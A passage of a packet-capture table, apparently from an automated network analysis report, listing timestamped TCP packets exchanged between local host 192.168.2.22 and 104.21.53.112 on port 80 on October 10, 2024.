                      Oct 10, 2024 09:40:28.380484104 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.380500078 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.380513906 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380526066 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380548954 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380578041 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.380593061 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.380609035 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.380620956 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380637884 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.380660057 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.464823008 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.464925051 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.464941025 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465137959 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465161085 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465198994 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465209007 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465223074 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465256929 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465280056 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465293884 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465301991 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465316057 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465331078 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465339899 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465353966 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465368986 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465379000 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465390921 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465410948 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465435982 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465449095 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465462923 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465478897 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465486050 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465496063 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465508938 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465528011 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465544939 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465558052 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465579987 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465598106 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465605021 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465615988 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465627909 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465637922 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465657949 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465670109 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465682983 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465692997 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465704918 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465720892 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465728998 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465740919 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465751886 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465761900 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465786934 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465953112 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.465970993 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.465997934 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466017008 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466022968 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466032028 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466043949 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466053009 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466065884 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466079950 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466089964 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466100931 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466110945 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466120005 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466134071 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466144085 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466156006 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466170073 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466181040 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466192961 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466201067 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466223955 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466232061 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466244936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466262102 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466269016 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466279030 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466289997 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466299057 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466311932 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466325998 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466345072 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466447115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466857910 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466903925 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466914892 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466929913 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466953039 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466972113 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.466983080 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.466996908 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467010975 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467022896 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467035055 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467042923 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467070103 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467087984 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467101097 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467114925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467129946 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467138052 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467147112 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467164993 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467180014 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467207909 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467221975 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467236042 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.467247963 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467267990 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467381954 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.467621088 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.469969988 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.469985962 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.470001936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.470022917 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.470041037 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471216917 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471232891 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471249104 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471266985 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471276045 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471287012 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471298933 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471313953 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471324921 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471335888 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471362114 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471371889 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471398115 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471409082 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471429110 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471451044 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471466064 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471478939 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471491098 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471502066 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471510887 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471524954 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471539021 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471548080 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.471559048 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.471577883 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722084045 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722163916 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722202063 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722210884 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722222090 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722237110 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722249031 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722255945 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722266912 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722276926 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722290993 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722300053 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722328901 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722368002 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722378016 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722388029 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722398043 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722404957 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722415924 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722428083 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722433090 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722444057 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722450972 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722461939 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722470045 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722489119 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722502947 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722536087 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722552061 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722563982 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722570896 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722584009 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722592115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722604990 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722610950 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722631931 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722641945 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722649097 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722688913 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722755909 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722786903 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722805977 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722811937 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722826004 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722836971 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722847939 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722866058 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722877026 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722887039 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722898960 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722908020 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.722915888 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722963095 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.722990990 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723004103 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723018885 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723037958 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723037958 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723051071 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723058939 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723073006 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723088026 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723094940 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723105907 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723114014 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723126888 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723133087 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723145008 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723154068 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723165035 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723175049 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723182917 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723195076 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723206997 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723217010 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723227978 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723237038 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723244905 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723257065 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.723273039 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.723289013 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725033998 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725081921 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725090981 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725101948 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725133896 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725145102 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725162029 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725171089 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725203037 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725212097 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725229025 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725238085 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725246906 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725266933 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725296021 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725296021 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725488901 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725531101 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725549936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725590944 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725611925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725620985 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725650072 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725658894 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725693941 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725704908 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725713968 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725733042 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725747108 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725754023 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725754023 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725763083 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725776911 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725795031 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.725954056 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725964069 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725971937 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.725995064 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726011038 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726011038 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726022005 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726036072 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726046085 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726056099 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726063013 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726063013 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726074934 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726082087 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726094007 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726109028 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726125002 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726134062 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726141930 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726150990 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726165056 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726171970 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726183891 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726190090 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726190090 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726190090 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726203918 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726210117 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726226091 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726246119 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726615906 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726624966 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726634026 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726660967 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726674080 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726830959 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726840019 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726849079 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726871014 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726876974 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726890087 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726906061 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726932049 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726948977 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726958036 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726968050 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.726974010 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.726989031 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727009058 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727013111 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727049112 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727194071 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727233887 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727262020 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727272034 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727299929 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727317095 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727327108 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727355957 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727863073 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727875948 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727885962 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727895021 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727905035 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727916002 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727922916 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727929115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727937937 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727943897 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727952003 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.727969885 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.727983952 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.728023052 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728063107 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.728070974 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728080988 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728106022 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728111982 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.728120089 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728130102 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.728135109 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.728152990 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.728173971 CEST4916380192.168.2.22104.21.53.112
